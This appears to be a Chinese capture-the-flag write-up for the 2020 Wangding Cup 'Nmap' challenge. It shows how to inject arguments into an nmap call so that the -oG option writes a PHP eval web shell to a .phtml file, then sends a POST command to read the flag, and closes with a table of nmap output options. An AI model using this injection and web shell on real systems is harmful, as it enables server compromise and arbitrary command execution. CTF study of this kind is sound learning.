[网鼎杯 2020 朱雀组]Nmap

首先试试127.0.0.1
是可以进去的。但是没什么用。
换了几个,发现都是能进入
但是都只是

而且这个页面会改变的只有hostname
尝试了一下ssti注入,发现没什么用
查阅发现这道题使用的通过nmap语句进行创建一个新的文件,并且将一句话木马传入其中,然后再进行命令执行
同时,我们发现,这道题禁用了php
所以构建
' <? echo @eval($_POST["a"]);?> -oG a.phtml '  | 
oG是nmap语法,放到最后一起总结了
上传这个之后,我们发现被哔了
这是因为我们传上去的不是一个ip地址
所以我们这里要同时传一个可通过的地址上去
所以我们采用 | (前面当参数,执行后面)
最终构建payload:
127.0.0.1 | ' <? echo @eval($_POST["a"]);?> -oG a.phtml '  | 
输入之后的同时,我们就创建了一个名为a的phtml文件
所以我们访问之后,post传参一个
a=system("cat /flag");  | 
拿下!
Nmap:
选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件
例:
选项-oG  |